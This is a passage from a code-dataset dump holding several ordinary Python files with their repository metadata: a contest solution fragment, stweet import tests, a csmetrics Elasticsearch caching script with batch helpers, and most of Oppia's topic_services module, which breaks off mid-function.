mult = (mult * fact(singles.pop(first[-1], 0))) % P
for ch in chunks:
assert len(set(ch)) == len(ch)
if ch[0] in first:
if ch[0] in first[:-1]:
raise NotPossible()
# assert not any(c == ch[0] for c in ch[1:])
if any([c in first for c in ch[1:]]):
raise NotPossible()
assert ch[0] == first[-1]
chunks.remove(ch)
chunks.append(first + ch[1:])
break
if ch[-1] in first:
if ch[-1] in first[1:]:
raise NotPossible()
# assert not any(c == ch[-1] for c in ch[:-1])
if any([c in first for c in ch[:-1]]):
raise NotPossible()
assert ch[-1] == first[0]
chunks.remove(ch)
chunks.append(ch + first[1:])
break
else:
left += 1
continue
# print mult, left, singles, chunks
for k, v in singles.iteritems():
left += 1
mult = (mult * fact(v)) % P
assert left >= 0
while left:
mult = (mult * left) % P
left = left - 1
print "Case #%d: %d" % (_T+1, mult)
except NotPossible:
print "Case #%d: 0" % (_T+1,)
assert not l
avg_line_length: 28.661017 | max_line_length: 70 | alphanum_fraction: 0.385866

hexsha: 1930b4415c3c4b687360203a5118f66249b43b8f | size: 815 | ext: py | lang: Python
max_stars: tests/integration/import_older_version_test.py @ markowanga/stweet (7f103b5c88fcef1d993d8cdc99cec358e55293f7), licenses ["MIT"], count 101, events 2020-11-22T16:44:25.000Z to 2022-03-30T08:42:07.000Z
max_issues: tests/integration/import_older_version_test.py @ markowanga/stweet (7f103b5c88fcef1d993d8cdc99cec358e55293f7), licenses ["MIT"], count 53, events 2020-11-21T19:40:36.000Z to 2022-03-02T10:09:52.000Z
max_forks: tests/integration/import_older_version_test.py @ markowanga/stweet (7f103b5c88fcef1d993d8cdc99cec358e55293f7), licenses ["MIT"], count 16, events 2020-12-12T23:02:51.000Z to 2022-03-01T12:10:32.000Z
content:
import stweet as st
_RESOURCES_PATH = 'tests/resources'
def test_tweets_csv_import_v1_1_2():
csv_filename = f'{_RESOURCES_PATH}/tweets_v1.1.2.csv'
tweets_from_csv = st.read_tweets_from_csv_file(csv_filename)
assert len(tweets_from_csv) == 9
def test_tweets_json_import_v1_1_2():
jl_filename = f'{_RESOURCES_PATH}/tweets_v1.1.2.jl'
tweets_from_csv = st.read_tweets_from_json_lines_file(jl_filename)
assert len(tweets_from_csv) == 9
def test_user_csv_import_v1_3_0():
csv_filename = f'{_RESOURCES_PATH}/users_v1.3.0.csv'
users = st.read_users_from_csv_file(csv_filename)
assert len(users) == 2
def test_user_json_import_v1_3_0():
jl_filename = f'{_RESOURCES_PATH}/users_v1.3.0.jl'
users = st.read_users_from_json_lines_file(jl_filename)
assert len(users) == 2
avg_line_length: 29.107143 | max_line_length: 70 | alphanum_fraction: 0.759509

hexsha: c8ca6d662ca0898630009cc66097b2c473edc66d | size: 5,257 | ext: py | lang: Python
max_stars: graph/save_cache.py @ csmetrics/csmetrics.org (fa2ec2f264680a71ac6ea46d303573d24dfbe653), licenses ["CC-BY-4.0"], count 21, events 2017-09-19T11:43:04.000Z to 2021-12-06T17:04:05.000Z
max_issues: graph/save_cache.py @ 123Powerful/csmetrics.org (788367fe32947bbd56ec2c13cee4f49dd79de231), licenses ["CC-BY-4.0"], count 54, events 2017-08-31T22:42:51.000Z to 2022-03-15T02:12:05.000Z
max_forks: graph/save_cache.py @ 123Powerful/csmetrics.org (788367fe32947bbd56ec2c13cee4f49dd79de231), licenses ["CC-BY-4.0"], count 9, events 2017-09-03T10:54:07.000Z to 2022-01-16T02:44:31.000Z
content:
import os, sys, json, uuid, hashlib
from multiprocessing import Pool
from elasticsearch_dsl.connections import connections
from datetime import datetime
from graph.schema_cache import BrowseCache, AuthorGroup, PaperGroup, AuthorInfo, PaperInfo
from graph.config import conf
hostname = conf.get("elasticsearch.hostname")
def generate_uuid(seed = None):
return uuid.uuid1() if not seed else hashlib.sha1(str.encode(seed)).hexdigest()
def init_es():
connections.create_connection(hosts = hostname, timeout=20)
print("Elasticsearch connections initialized")
def saveNewAuthorGroupCache(cache):
print("starting cache")
init_es()
assert cache["Type"] in cache_types["author_group"]
doc = AuthorGroup()
doc.Type = cache["Type"]
doc.NormalizedNames = cache["NormalizedNames"]
doc.DisplayName = cache["DisplayName"]
doc.Year = cache["Year"] if ("Year" in cache and cache['Year'].isdigit()) else None
doc.Affiliations = cache["Affiliations"] if "Affiliations" in cache else None
doc.Keywords = cache["Keywords"] if "Keywords" in cache else None
doc.Url = cache['Url'] if 'Url' in cache else None
doc.Citation = cache['Citation']
doc.AuthorIds = cache['AuthorIds'] if 'AuthorIds' in cache else None
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}".format(doc.Type, doc.DisplayName))
doc.meta.index = "browse_author_group"
doc.save()
print("finished caching")
def saveNewPaperGroupCache(cache):
print("starting cache")
init_es()
assert cache["Type"] in cache_types["paper_group"]
doc = PaperGroup()
doc.Type = cache["Type"]
doc.NormalizedName = cache["NormalizedName"]
doc.DisplayName = cache["DisplayName"]
doc.PaperIds = cache["PaperIds"]
doc.Year = cache["Year"] if ("Year" in cache and cache['Year'].isdigit()) else None
doc.Field = cache["Field"] if "Field" in cache else None
doc.Keywords = cache["Keywords"] if "Keywords" in cache else None
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}={}".format(doc.Year, doc.Field, doc.NormalizedName))
doc.meta.index = "browse_paper_group"
doc.save()
def saveNewBrowseCache(cache):
print("starting cache")
init_es()
# validation
assert "DisplayName" in cache
assert "EntityIds" in cache
assert "Type" in cache
doc = BrowseCache()
# required fields
doc.Type = cache["Type"]
doc.DisplayName = cache["DisplayName"]
doc.EntityIds = {}
for key in cache["EntityIds"]:
doc.EntityIds[key] = cache["EntityIds"][key]
# optional fields
if "Citation" in cache: doc.Citation = cache["Citation"]
if "Year" in cache and str(cache["Year"]).isdigit() : doc.Year = cache["Year"]
if "Field" in cache: doc.Field = cache["Field"]
if "Affiliations" in cache: doc.Affiliations = cache["Affiliations"]
if "Url" in cache: doc.Url = cache["Url"]
if "PhotoUrl" in cache: doc.PhotoUrl = cache["PhotoUrl"]
for key,value in cache.items():
if key not in ["Type","DisplayName","EntityIds","Citation","Year","Field","Affiliations","Url","PhotoUrl"]: doc[key] = value
# meta data
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}".format(doc.DisplayName, doc.Type))
doc.meta.index = "browse_cache"
print(doc.to_dict())
doc.save()
# return generated id for document
return doc.meta.id
import json
from core.search.query_info import paper_info_mag_check_multiquery
batchPath = "/home/u5798145/papers_to_cache"
def addToBatch(new_papers):
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
papers += new_papers
papers = list(set(papers))
with open(batchPath, 'w') as fh:
json.dump(papers,fh)
def getBatch():
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
return papers
def emptyBatch():
with open(batchPath, 'w') as fh:
json.dump([],fh)
def cacheBatch():
batchsize = 150
while sizeBatch() > 0:
batch = getBatch()
batchindex = min([batchsize, len(batch)])
minibatch = batch[0:batchindex]
rebatch = batch[batchindex:len(batch)]
print("caching {} papers".format(len(minibatch)))
paper_info_mag_check_multiquery(minibatch)
print("{} papers remaining in batch".format(len(rebatch)))
emptyBatch()
addToBatch(rebatch)
def sizeBatch():
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
return len(papers)
def main():
if len(sys.argv) > 2:
if sys.argv[1] == "batch":
if sys.argv[2] == "get":
for line in getBatch():
print(line)
elif sys.argv[2] == "empty":
emptyBatch()
elif sys.argv[2] == "cache":
cacheBatch()
elif sys.argv[2] == "add" and len(sys.argv) > 3:
addToBatch(sys.argv[3].split(','))
elif sys.argv[2] == "size":
print(sizeBatch())
if __name__ == '__main__':
main()
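The required versus optional fields of `saveNewBrowseCache` follow directly from its assertions; a hedged example payload (every value below is invented, and the call is commented out because it writes to Elasticsearch):

```python
# Invented example payload; only the field names come from saveNewBrowseCache above.
example_cache = {
    "Type": "author",                                   # required
    "DisplayName": "Ada Lovelace",                      # required
    "EntityIds": {"mag": [12345]},                      # required
    "Citation": 321,                                    # optional
    "Year": "1843",                                     # optional, kept only when it is all digits
    "Affiliations": ["Analytical Engine Society"],      # optional
}
# doc_id = saveNewBrowseCache(example_cache)            # would index the document into browse_cache
```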
avg_line_length: 33.062893 | max_line_length: 132 | alphanum_fraction: 0.62393

hexsha: cf6fc96b194152e95e1e9f9a20e403f955f872d7 | size: 50,272 | ext: py | lang: Python
max_stars: core/domain/topic_services.py @ prayutsu/oppia (e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786), licenses ["Apache-2.0"], count 2, events 2020-03-28T18:32:45.000Z to 2021-02-07T18:29:31.000Z
max_issues: core/domain/topic_services.py @ prayutsu/oppia (e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786), licenses ["Apache-2.0"], count 1, events 2021-01-06T06:00:08.000Z to 2021-01-07T02:00:21.000Z
max_forks: core/domain/topic_services.py @ prayutsu/oppia (e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786), licenses ["Apache-2.0"], count 1, events 2022-02-14T22:03:53.000Z to 2022-02-14T22:03:53.000Z
content:
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands for operations on topics, and related models."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import collections
import logging
from core.domain import caching_services
from core.domain import feedback_services
from core.domain import opportunity_services
from core.domain import rights_domain
from core.domain import role_services
from core.domain import state_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import subtopic_page_domain
from core.domain import subtopic_page_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import user_services
from core.platform import models
import feconf
import python_utils
import utils
(topic_models,) = models.Registry.import_models([models.NAMES.topic])
datastore_services = models.Registry.import_datastore_services()
def get_all_topic_summaries():
"""Returns the summaries of all topics present in the datastore.
Returns:
list(TopicSummary). The list of summaries of all topics present in the
datastore.
"""
topic_summaries_models = topic_models.TopicSummaryModel.get_all()
topic_summaries = [
get_topic_summary_from_model(summary)
for summary in topic_summaries_models]
return topic_summaries
def get_multi_topic_summaries(topic_ids):
"""Returns the summaries of all topics whose topic ids are passed in.
Args:
topic_ids: list(str). The IDs of topics for which summaries are to be
returned.
Returns:
list(TopicSummary). The list of summaries of all given topics present in
the datastore.
"""
topic_summaries_models = topic_models.TopicSummaryModel.get_multi(topic_ids)
topic_summaries = [
get_topic_summary_from_model(summary) if summary else None
for summary in topic_summaries_models]
return topic_summaries
def get_all_skill_ids_assigned_to_some_topic():
"""Returns the ids of all the skills that are linked to some topics.
Returns:
set([str]). The ids of all the skills linked to some topic.
"""
skill_ids = set([])
all_topic_models = topic_models.TopicModel.get_all()
all_topics = [
topic_fetchers.get_topic_from_model(topic)
for topic in all_topic_models]
for topic in all_topics:
skill_ids.update(topic.get_all_skill_ids())
return skill_ids
def get_topic_summary_from_model(topic_summary_model):
"""Returns a domain object for an Oppia topic summary given a
topic summary model.
Args:
topic_summary_model: TopicSummaryModel. The topic summary model object
to get the corresponding domain object.
Returns:
TopicSummary. The domain object corresponding to the given model object.
"""
return topic_domain.TopicSummary(
topic_summary_model.id, topic_summary_model.name,
topic_summary_model.canonical_name,
topic_summary_model.language_code,
topic_summary_model.description,
topic_summary_model.version,
topic_summary_model.canonical_story_count,
topic_summary_model.additional_story_count,
topic_summary_model.uncategorized_skill_count,
topic_summary_model.subtopic_count,
topic_summary_model.total_skill_count,
topic_summary_model.thumbnail_filename,
topic_summary_model.thumbnail_bg_color,
topic_summary_model.url_fragment,
topic_summary_model.topic_model_created_on,
topic_summary_model.topic_model_last_updated
)
def get_topic_summary_by_id(topic_id, strict=True):
"""Returns a domain object representing a topic summary.
Args:
topic_id: str. ID of the topic summary.
strict: bool. Whether to fail noisily if no topic summary with the given
id exists in the datastore.
Returns:
TopicSummary or None. The topic summary domain object corresponding to
a topic with the given topic_id, if it exists, or else None.
"""
topic_summary_model = topic_models.TopicSummaryModel.get(
topic_id, strict=strict)
if topic_summary_model:
topic_summary = get_topic_summary_from_model(topic_summary_model)
return topic_summary
else:
return None
def get_new_topic_id():
"""Returns a new topic id.
Returns:
str. A new topic id.
"""
return topic_models.TopicModel.get_new_id('')
def _create_topic(committer_id, topic, commit_message, commit_cmds):
"""Creates a new topic, and ensures that rights for a new topic
are saved first.
Args:
committer_id: str. ID of the committer.
topic: Topic. Topic domain object.
commit_message: str. A description of changes made to the topic.
commit_cmds: list(TopicChange). A list of TopicChange objects that
represent change commands made to the given topic.
"""
topic.validate()
if does_topic_with_name_exist(topic.name):
raise utils.ValidationError(
'Topic with name \'%s\' already exists' % topic.name)
if does_topic_with_url_fragment_exist(topic.url_fragment):
raise utils.ValidationError(
'Topic with URL Fragment \'%s\' already exists'
% topic.url_fragment)
create_new_topic_rights(topic.id, committer_id)
model = topic_models.TopicModel(
id=topic.id,
name=topic.name,
abbreviated_name=topic.abbreviated_name,
url_fragment=topic.url_fragment,
thumbnail_bg_color=topic.thumbnail_bg_color,
thumbnail_filename=topic.thumbnail_filename,
canonical_name=topic.canonical_name,
description=topic.description,
language_code=topic.language_code,
canonical_story_references=[
reference.to_dict()
for reference in topic.canonical_story_references],
additional_story_references=[
reference.to_dict()
for reference in topic.additional_story_references],
uncategorized_skill_ids=topic.uncategorized_skill_ids,
subtopic_schema_version=topic.subtopic_schema_version,
story_reference_schema_version=topic.story_reference_schema_version,
next_subtopic_id=topic.next_subtopic_id,
subtopics=[subtopic.to_dict() for subtopic in topic.subtopics],
meta_tag_content=topic.meta_tag_content,
practice_tab_is_displayed=topic.practice_tab_is_displayed,
page_title_fragment_for_web=topic.page_title_fragment_for_web
)
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
topic.version += 1
generate_topic_summary(topic.id)
def does_topic_with_name_exist(topic_name):
"""Checks if the topic with provided name exists.
Args:
topic_name: str. The topic name.
Returns:
        bool. Whether the topic name exists.
Raises:
Exception. Topic name is not a string.
"""
if not isinstance(topic_name, python_utils.BASESTRING):
raise utils.ValidationError('Name should be a string.')
existing_topic = topic_fetchers.get_topic_by_name(topic_name)
return existing_topic is not None
def does_topic_with_url_fragment_exist(url_fragment):
"""Checks if topic with provided url fragment exists.
Args:
url_fragment: str. The url fragment for the topic.
Returns:
        bool. Whether the url fragment for the topic exists.
Raises:
Exception. Topic URL fragment is not a string.
"""
if not isinstance(url_fragment, python_utils.BASESTRING):
raise utils.ValidationError('Topic URL fragment should be a string.')
existing_topic = (
topic_fetchers.get_topic_by_url_fragment(url_fragment))
return existing_topic is not None
def save_new_topic(committer_id, topic):
"""Saves a new topic.
Args:
committer_id: str. ID of the committer.
topic: Topic. Topic to be saved.
"""
commit_message = (
'New topic created with name \'%s\'.' % topic.name)
_create_topic(
committer_id, topic, commit_message, [topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': topic.name
})])
def apply_change_list(topic_id, change_list):
"""Applies a changelist to a topic and returns the result. The incoming
    changelist should not have simultaneous creation and deletion of
subtopics.
Args:
topic_id: str. ID of the given topic.
change_list: list(TopicChange). A change list to be applied to the given
topic.
Raises:
        Exception. The incoming changelist had simultaneous creation and
deletion of subtopics.
Returns:
tuple(Topic, dict, list(int), list(int), list(SubtopicPageChange)). The
modified topic object, the modified subtopic pages dict keyed
by subtopic page id containing the updated domain objects of
each subtopic page, a list of ids of the deleted subtopics,
a list of ids of the newly created subtopics and a list of changes
applied to modified subtopic pages.
"""
topic = topic_fetchers.get_topic_by_id(topic_id)
newly_created_subtopic_ids = []
existing_subtopic_page_ids_to_be_modified = []
deleted_subtopic_ids = []
modified_subtopic_pages_list = []
modified_subtopic_pages = {}
modified_subtopic_change_cmds = collections.defaultdict(list)
for change in change_list:
if (change.cmd ==
subtopic_page_domain.CMD_UPDATE_SUBTOPIC_PAGE_PROPERTY):
if change.subtopic_id < topic.next_subtopic_id:
existing_subtopic_page_ids_to_be_modified.append(
change.subtopic_id)
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
modified_subtopic_change_cmds[subtopic_page_id].append(
change)
modified_subtopic_pages_list = (
subtopic_page_services.get_subtopic_pages_with_ids(
topic_id, existing_subtopic_page_ids_to_be_modified))
for subtopic_page in modified_subtopic_pages_list:
modified_subtopic_pages[subtopic_page.id] = subtopic_page
try:
for change in change_list:
if change.cmd == topic_domain.CMD_ADD_SUBTOPIC:
topic.add_subtopic(change.subtopic_id, change.title)
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
modified_subtopic_pages[subtopic_page_id] = (
subtopic_page_domain.SubtopicPage.create_default_subtopic_page( # pylint: disable=line-too-long
change.subtopic_id, topic_id)
)
modified_subtopic_change_cmds[subtopic_page_id].append(
subtopic_page_domain.SubtopicPageChange({
'cmd': 'create_new',
'topic_id': topic_id,
'subtopic_id': change.subtopic_id
}))
newly_created_subtopic_ids.append(change.subtopic_id)
elif change.cmd == topic_domain.CMD_DELETE_SUBTOPIC:
topic.delete_subtopic(change.subtopic_id)
if change.subtopic_id in newly_created_subtopic_ids:
raise Exception(
'The incoming changelist had simultaneous'
' creation and deletion of subtopics.')
deleted_subtopic_ids.append(change.subtopic_id)
elif change.cmd == topic_domain.CMD_ADD_CANONICAL_STORY:
topic.add_canonical_story(change.story_id)
elif change.cmd == topic_domain.CMD_DELETE_CANONICAL_STORY:
topic.delete_canonical_story(change.story_id)
elif change.cmd == topic_domain.CMD_REARRANGE_CANONICAL_STORY:
topic.rearrange_canonical_story(
change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_ADD_ADDITIONAL_STORY:
topic.add_additional_story(change.story_id)
elif change.cmd == topic_domain.CMD_DELETE_ADDITIONAL_STORY:
topic.delete_additional_story(change.story_id)
elif change.cmd == topic_domain.CMD_ADD_UNCATEGORIZED_SKILL_ID:
topic.add_uncategorized_skill_id(
change.new_uncategorized_skill_id)
elif change.cmd == topic_domain.CMD_REMOVE_UNCATEGORIZED_SKILL_ID:
topic.remove_uncategorized_skill_id(
change.uncategorized_skill_id)
elif change.cmd == topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC:
topic.move_skill_id_to_subtopic(
change.old_subtopic_id, change.new_subtopic_id,
change.skill_id)
elif change.cmd == topic_domain.CMD_REARRANGE_SKILL_IN_SUBTOPIC:
topic.rearrange_skill_in_subtopic(
change.subtopic_id, change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_REARRANGE_SUBTOPIC:
topic.rearrange_subtopic(change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_REMOVE_SKILL_ID_FROM_SUBTOPIC:
topic.remove_skill_id_from_subtopic(
change.subtopic_id, change.skill_id)
elif change.cmd == topic_domain.CMD_UPDATE_TOPIC_PROPERTY:
if (change.property_name ==
topic_domain.TOPIC_PROPERTY_NAME):
topic.update_name(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_ABBREVIATED_NAME):
topic.update_abbreviated_name(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_URL_FRAGMENT):
topic.update_url_fragment(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_DESCRIPTION):
topic.update_description(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_LANGUAGE_CODE):
topic.update_language_code(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_THUMBNAIL_FILENAME):
topic.update_thumbnail_filename(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_THUMBNAIL_BG_COLOR):
topic.update_thumbnail_bg_color(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_META_TAG_CONTENT):
topic.update_meta_tag_content(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_PRACTICE_TAB_IS_DISPLAYED):
topic.update_practice_tab_is_displayed(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_PAGE_TITLE_FRAGMENT_FOR_WEB):
topic.update_page_title_fragment_for_web(change.new_value)
elif (change.cmd ==
subtopic_page_domain.CMD_UPDATE_SUBTOPIC_PAGE_PROPERTY):
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
if ((modified_subtopic_pages[subtopic_page_id] is None) or
(change.subtopic_id in deleted_subtopic_ids)):
raise Exception(
'The subtopic with id %s doesn\'t exist' % (
change.subtopic_id))
if (change.property_name ==
subtopic_page_domain.
SUBTOPIC_PAGE_PROPERTY_PAGE_CONTENTS_HTML):
page_contents = state_domain.SubtitledHtml.from_dict(
change.new_value)
page_contents.validate()
modified_subtopic_pages[
subtopic_page_id].update_page_contents_html(
page_contents)
elif (change.property_name ==
subtopic_page_domain.
SUBTOPIC_PAGE_PROPERTY_PAGE_CONTENTS_AUDIO):
modified_subtopic_pages[
subtopic_page_id].update_page_contents_audio(
state_domain.RecordedVoiceovers.from_dict(
change.new_value))
elif change.cmd == topic_domain.CMD_UPDATE_SUBTOPIC_PROPERTY:
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_TITLE):
topic.update_subtopic_title(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_THUMBNAIL_FILENAME):
topic.update_subtopic_thumbnail_filename(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_THUMBNAIL_BG_COLOR):
topic.update_subtopic_thumbnail_bg_color(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_URL_FRAGMENT):
topic.update_subtopic_url_fragment(
change.subtopic_id, change.new_value)
elif (
change.cmd ==
topic_domain.CMD_MIGRATE_SUBTOPIC_SCHEMA_TO_LATEST_VERSION):
# Loading the topic model from the datastore into a
# Topic domain object automatically converts it to use the
# latest schema version. As a result, simply resaving the
# topic is sufficient to apply the schema migration.
continue
return (
topic, modified_subtopic_pages, deleted_subtopic_ids,
newly_created_subtopic_ids, modified_subtopic_change_cmds)
except Exception as e:
logging.error(
'%s %s %s %s' % (
e.__class__.__name__, e, topic_id, change_list)
)
python_utils.reraise_exception()
def _save_topic(committer_id, topic, commit_message, change_list):
"""Validates a topic and commits it to persistent storage. If
successful, increments the version number of the incoming topic domain
object by 1.
Args:
committer_id: str. ID of the given committer.
topic: Topic. The topic domain object to be saved.
commit_message: str. The commit message.
change_list: list(TopicChange). List of changes applied to a topic.
Raises:
Exception. Received invalid change list.
Exception. The topic model and the incoming topic domain
object have different version numbers.
"""
if not change_list:
raise Exception(
'Unexpected error: received an invalid change list when trying to '
'save topic %s: %s' % (topic.id, change_list))
topic_rights = topic_fetchers.get_topic_rights(topic.id, strict=False)
topic.validate(strict=topic_rights.topic_is_published)
topic_model = topic_models.TopicModel.get(topic.id, strict=False)
# Topic model cannot be None as topic is passed as parameter here and that
# is only possible if a topic model with that topic id exists. Also this is
# a private function and so it cannot be called independently with any
# topic object.
if topic.version > topic_model.version:
raise Exception(
'Unexpected error: trying to update version %s of topic '
'from version %s. Please reload the page and try again.'
% (topic_model.version, topic.version))
elif topic.version < topic_model.version:
raise Exception(
'Trying to update version %s of topic from version %s, '
'which is too old. Please reload the page and try again.'
% (topic_model.version, topic.version))
topic_model.description = topic.description
topic_model.name = topic.name
topic_model.canonical_name = topic.canonical_name
topic_model.abbreviated_name = topic.abbreviated_name
topic_model.url_fragment = topic.url_fragment
topic_model.thumbnail_bg_color = topic.thumbnail_bg_color
topic_model.thumbnail_filename = topic.thumbnail_filename
topic_model.canonical_story_references = [
reference.to_dict() for reference in topic.canonical_story_references
]
topic_model.additional_story_references = [
reference.to_dict() for reference in topic.additional_story_references
]
topic_model.uncategorized_skill_ids = topic.uncategorized_skill_ids
topic_model.subtopics = [subtopic.to_dict() for subtopic in topic.subtopics]
topic_model.subtopic_schema_version = topic.subtopic_schema_version
topic_model.story_reference_schema_version = (
topic.story_reference_schema_version)
topic_model.next_subtopic_id = topic.next_subtopic_id
topic_model.language_code = topic.language_code
topic_model.meta_tag_content = topic.meta_tag_content
topic_model.practice_tab_is_displayed = topic.practice_tab_is_displayed
topic_model.page_title_fragment_for_web = topic.page_title_fragment_for_web
change_dicts = [change.to_dict() for change in change_list]
topic_model.commit(committer_id, commit_message, change_dicts)
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_TOPIC, None, [topic.id])
topic.version += 1
def update_topic_and_subtopic_pages(
committer_id, topic_id, change_list, commit_message):
"""Updates a topic and its subtopic pages. Commits changes.
Args:
committer_id: str. The id of the user who is performing the update
action.
topic_id: str. The topic id.
change_list: list(TopicChange and SubtopicPageChange). These changes are
applied in sequence to produce the resulting topic.
commit_message: str or None. A description of changes made to the
topic.
Raises:
ValueError. Current user does not have enough rights to edit a topic.
"""
if not commit_message:
raise ValueError(
'Expected a commit message, received none.')
old_topic = topic_fetchers.get_topic_by_id(topic_id)
(
updated_topic, updated_subtopic_pages_dict,
deleted_subtopic_ids, newly_created_subtopic_ids,
updated_subtopic_pages_change_cmds_dict
) = apply_change_list(topic_id, change_list)
if (
old_topic.url_fragment != updated_topic.url_fragment and
does_topic_with_url_fragment_exist(updated_topic.url_fragment)):
raise utils.ValidationError(
'Topic with URL Fragment \'%s\' already exists'
% updated_topic.url_fragment)
if (
old_topic.name != updated_topic.name and
does_topic_with_name_exist(updated_topic.name)):
raise utils.ValidationError(
'Topic with name \'%s\' already exists' % updated_topic.name)
_save_topic(
committer_id, updated_topic, commit_message, change_list
)
# The following loop deletes those subtopic pages that are already in the
# datastore, which are supposed to be deleted in the current changelist.
for subtopic_id in deleted_subtopic_ids:
if subtopic_id not in newly_created_subtopic_ids:
subtopic_page_services.delete_subtopic_page(
committer_id, topic_id, subtopic_id)
for subtopic_page_id in updated_subtopic_pages_dict:
subtopic_page = updated_subtopic_pages_dict[subtopic_page_id]
subtopic_page_change_list = updated_subtopic_pages_change_cmds_dict[
subtopic_page_id]
subtopic_id = subtopic_page.get_subtopic_id_from_subtopic_page_id()
# The following condition prevents the creation of subtopic pages that
# were deleted above.
if subtopic_id not in deleted_subtopic_ids:
subtopic_page_services.save_subtopic_page(
committer_id, subtopic_page, commit_message,
subtopic_page_change_list)
generate_topic_summary(topic_id)
if old_topic.name != updated_topic.name:
opportunity_services.update_opportunities_with_new_topic_name(
updated_topic.id, updated_topic.name)
def delete_uncategorized_skill(user_id, topic_id, uncategorized_skill_id):
"""Removes skill with given id from the topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the skill.
uncategorized_skill_id: str. The uncategorized skill to remove from the
topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': uncategorized_skill_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from uncategorized skill ids' % uncategorized_skill_id)
def add_uncategorized_skill(user_id, topic_id, uncategorized_skill_id):
"""Adds a skill with given id to the topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the skill is to be added.
uncategorized_skill_id: str. The id of the uncategorized skill to add
to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': uncategorized_skill_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to uncategorized skill ids' % uncategorized_skill_id)
def publish_story(topic_id, story_id, committer_id):
"""Marks the given story as published.
Args:
topic_id: str. The id of the topic.
story_id: str. The id of the given story.
committer_id: str. ID of the committer.
Raises:
Exception. The given story does not exist.
Exception. The story is already published.
Exception. The user does not have enough rights to publish the story.
"""
def _are_nodes_valid_for_publishing(story_nodes):
"""Validates the story nodes before publishing.
Args:
story_nodes: list(dict(str, *)). The list of story nodes dicts.
Raises:
Exception. The story node doesn't contain any exploration id or the
exploration id is invalid or isn't published yet.
"""
exploration_id_list = []
for node in story_nodes:
if not node.exploration_id:
raise Exception(
'Story node with id %s does not contain an '
'exploration id.' % node.id)
exploration_id_list.append(node.exploration_id)
story_services.validate_explorations_for_story(
exploration_id_list, True)
    topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
if topic is None:
raise Exception('A topic with the given ID doesn\'t exist')
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_STORY_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to publish the story.')
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise Exception('A story with the given ID doesn\'t exist')
for node in story.story_contents.nodes:
if node.id == story.story_contents.initial_node_id:
_are_nodes_valid_for_publishing([node])
topic.publish_story(story_id)
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_PUBLISH_STORY,
'story_id': story_id
})]
_save_topic(
committer_id, topic, 'Published story with id %s' % story_id,
change_list)
generate_topic_summary(topic.id)
opportunity_services.create_exploration_opportunities_for_story(
story_id, topic_id)
def unpublish_story(topic_id, story_id, committer_id):
"""Marks the given story as unpublished.
Args:
topic_id: str. The id of the topic.
story_id: str. The id of the given story.
committer_id: str. ID of the committer.
Raises:
Exception. The given story does not exist.
Exception. The story is already unpublished.
Exception. The user does not have enough rights to unpublish the story.
"""
user = user_services.UserActionsInfo(committer_id)
